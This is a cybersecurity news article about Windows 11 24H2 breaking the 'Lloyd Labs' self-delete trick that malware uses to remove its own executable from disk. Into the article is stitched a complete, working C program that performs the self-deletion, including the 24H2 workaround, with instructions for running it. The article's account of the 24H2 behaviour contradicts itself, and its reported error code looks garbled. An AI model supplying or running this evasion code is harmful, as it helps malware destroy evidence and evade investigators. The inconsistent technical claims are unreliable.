Windows 11 24H2 Disrupts Self-Delete Technique Used for Malware Evasion


Jun 9, 2025 - 13:10

Windows 11’s latest 24H2 update has inadvertently broken a widely-used malware evasion technique known as the Lloyd Labs self-delete method, forcing cybersecurity professionals and threat actors alike to adapt their tools and techniques for the new operating system environment.

The Lloyd Labs self-delete technique has been a staple for malware authors who want a dropper or implant to remove its own executable from disk once it is running.

Windows normally refuses this: a file whose image section is mapped into a process cannot be deleted, and a plain delete request fails with STATUS_CANNOT_DELETE. The technique sidesteps that restriction, so a running payload can erase its own file and leave investigators no sample to collect from the file system.

It works by manipulating the file's NTFS data streams and handles rather than by unmapping the image.

Under Windows 11 23H2 and earlier the sequence was: open the running executable with DELETE access; rename its default data stream (":$DATA") to an arbitrary alternate stream name via FileRenameInformation; close the handle; reopen the file; set the deletion disposition to TRUE via FileDispositionInformation; and close the handle, at which point NTFS removed the file. What disappears is the executable itself; other artifacts of execution (prefetch entries, the USN journal, event logs) are untouched.

Windows 11 24H2 Disrupts Lloyd Labs’ Self-Delete Technique

However, investigations by the researcher TKYN have revealed that Windows 11 24H2 changed how the NTFS driver handles this sequence of requests.

Instead of deleting the file, the new implementation leaves the file in place and moves its contents into an alternate data stream.

The file therefore looks empty in a casual directory listing, but its bytes remain on disk in that named stream, which defeats the purpose of self-deletion entirely.

The discovery emerged when multiple researchers noticed their proof-of-concept implementations failing on 24H2 systems. Through detailed kernel debugging and reverse engineering of the NTFS.sys driver, investigators identified that Microsoft had modified the NtfsSetDispositionInfo function between the two Windows versions.

comparison between two versions

The failure surfaces in the NtSetInformationFile call that sets FileDispositionInformation: on 24H2 it returns an error (reported as 0xF216D) when the old sequence is applied to a file that is still mapped into memory, as a running executable is.

To understand the root cause, researchers conducted a comparative analysis between NTFS.sys samples from both Windows versions using tools like Ghidra and WinDbg kernel debugging.

They traced the execution path to identify where the deletion logic diverged, discovering that 24H2 introduced additional security checks and modified handling procedures for file disposition operations.

The community has already produced a workaround: set the disposition through the FileDispositionInformationEx information class with the FILE_DISPOSITION_POSIX_SEMANTICS flag.

With POSIX semantics NTFS unlinks the file name as soon as the disposition is set, while the data stays reachable through handles that are already open until the last of them closes; this path is not subject to the new restrictions in 24H2's NTFS driver.

Updated implementations therefore pass a FILE_DISPOSITION_INFORMATION_EX structure whose Flags field is FILE_DISPOSITION_DELETE | FILE_DISPOSITION_POSIX_SEMANTICS.

The modified technique calls NtSetInformationFile with FileDispositionInformationEx instead of the classic FileDispositionInformation class (FileDispositionInfo in the Win32 naming), and deletes the file completely on 24H2 systems. FileDispositionInformationEx has existed since Windows 10 version 1709, so code switched to it keeps working on older builds as well.
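The handle sequence described earlier and the 24H2 workaround above, written out as an added C example. This is not LloydLabs' proof of concept nor code from the article; it assumes the ntifs.h information-class numbers (FileRenameInformation = 10, FileDispositionInformation = 13, FileDispositionInformationEx = 64) and flag values redeclared locally, resolves NtSetInformationFile from ntdll at runtime, and uses the arbitrary stream name ":sd_gone". The NT structures are declared with fixed-width types so the rename-buffer helper (where the classic mistake, bytes versus characters in FileNameLength, lives) also compiles and can be checked on a non-Windows host; the deletion itself only exists under _WIN32. Run it on a copy of the binary, because a successful run deletes the executable that is running.

```c
/*
 * Added example: Lloyd Labs-style self-delete with the 24H2 workaround.
 * Build on Windows: cl /W4 self_delete.c   or   gcc -o self_delete.exe self_delete.c
 * Only the buffer helper compiles on non-Windows hosts.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Information classes and flags as in ntifs.h (winternl.h does not expose them). */
#define SD_FileRenameInformation            10
#define SD_FileDispositionInformation       13
#define SD_FileDispositionInformationEx     64
#define SD_FILE_DISPOSITION_DELETE          0x00000001u
#define SD_FILE_DISPOSITION_POSIX_SEMANTICS 0x00000002u

/* Name the default ":$DATA" stream is renamed to; any name works (assumption). */
#define SD_NEW_STREAM ":sd_gone"

typedef struct sd_rename_info {          /* FILE_RENAME_INFORMATION, x86/x64 layout */
    uint8_t  ReplaceIfExists;
    void    *RootDirectory;
    uint32_t FileNameLength;             /* in bytes, not characters */
    uint16_t FileName[];                 /* UTF-16LE, not NUL-terminated */
} sd_rename_info;
typedef struct sd_disposition_info    { uint8_t  DeleteFile; } sd_disposition_info;    /* FILE_DISPOSITION_INFORMATION */
typedef struct sd_disposition_info_ex { uint32_t Flags;      } sd_disposition_info_ex; /* FILE_DISPOSITION_INFORMATION_EX */

/* Fill a FILE_RENAME_INFORMATION buffer from an ASCII stream name such as ":foo".
 * buf must be pointer-aligned. Returns the byte length to pass to NtSetInformationFile,
 * or 0 if the name is empty or cap is too small. */
size_t sd_build_rename_info(const char *stream, void *buf, size_t cap)
{
    size_t n = strlen(stream);
    size_t need = offsetof(sd_rename_info, FileName) + n * sizeof(uint16_t);
    if (n == 0 || need > cap) return 0;
    sd_rename_info *ri = (sd_rename_info *)buf;
    memset(ri, 0, need);                 /* ReplaceIfExists = FALSE, RootDirectory = NULL */
    ri->FileNameLength = (uint32_t)(n * sizeof(uint16_t));
    for (size_t i = 0; i < n; i++)
        ri->FileName[i] = (uint16_t)(unsigned char)stream[i];  /* widen ASCII to UTF-16LE */
    return need;
}

#ifdef _WIN32
#include <windows.h>
typedef struct sd_iosb { union { LONG Status; PVOID Pointer; } u; ULONG_PTR Information; } sd_iosb;
typedef LONG (NTAPI *sd_NtSetInformationFile_t)(HANDLE, sd_iosb *, PVOID, ULONG, ULONG);

/* Delete the running executable. posix = 1 uses FileDispositionInformationEx with
 * POSIX semantics (the 24H2 workaround); posix = 0 is the pre-24H2 sequence.
 * Returns 0 on success, the failing NTSTATUS, or -1 for a Win32-level failure. */
LONG sd_delete_self(int posix)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    sd_NtSetInformationFile_t NtSetInformationFile = ntdll
        ? (sd_NtSetInformationFile_t)GetProcAddress(ntdll, "NtSetInformationFile") : NULL;
    WCHAR path[MAX_PATH];
    if (!NtSetInformationFile || !GetModuleFileNameW(NULL, path, MAX_PATH)) return -1;

    /* 1. Open our own image with DELETE access. */
    HANDLE h = CreateFileW(path, DELETE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return -1;

    /* 2. Rename the default data stream; the loader's image mapping follows the renamed stream. */
    uint64_t raw[16];                                /* pointer-aligned scratch buffer */
    size_t len = sd_build_rename_info(SD_NEW_STREAM, raw, sizeof raw);
    sd_iosb iosb = {0};
    LONG st = NtSetInformationFile(h, &iosb, raw, (ULONG)len, SD_FileRenameInformation);
    CloseHandle(h);                                  /* 3. close */
    if (st < 0) return st;

    /* 4. Reopen the file, whose default stream is now empty. */
    h = CreateFileW(path, DELETE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return -1;

    /* 5. Set the delete disposition, old style or POSIX style. */
    if (posix) {
        sd_disposition_info_ex dx = { SD_FILE_DISPOSITION_DELETE | SD_FILE_DISPOSITION_POSIX_SEMANTICS };
        st = NtSetInformationFile(h, &iosb, &dx, sizeof dx, SD_FileDispositionInformationEx);
    } else {
        sd_disposition_info d = { 1 };
        st = NtSetInformationFile(h, &iosb, &d, sizeof d, SD_FileDispositionInformation);
    }
    CloseHandle(h);                                  /* 6. last handle closed: file is gone */
    return st;
}

int main(void)
{
    LONG st = sd_delete_self(1);
    printf("self-delete via FileDispositionInformationEx: NTSTATUS 0x%08lx\n", (unsigned long)st);
    return st == 0 ? 0 : 1;
}
#endif
```

To reproduce the 24H2 behaviour the article describes, call sd_delete_self(0) instead and then list the file's streams (for example with `dir /r`): the old path leaves the binary's bytes in the renamed alternate stream, while sd_delete_self(1) removes the file.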

This development highlights the ongoing cat-and-mouse game between operating system security improvements and evasion technique evolution.

While Microsoft’s changes were presumably aimed at file-handling robustness rather than at this trick, they inadvertently broke a technique relied upon by legitimate security tooling as well as by malware.

The rapid community response demonstrates the adaptability of modern cybersecurity research and the importance of continuous technique validation across operating system updates.


The post Windows 11 24H2 Disrupts Self-Delete Technique Used for Malware Evasion appeared first on Cyber Security News.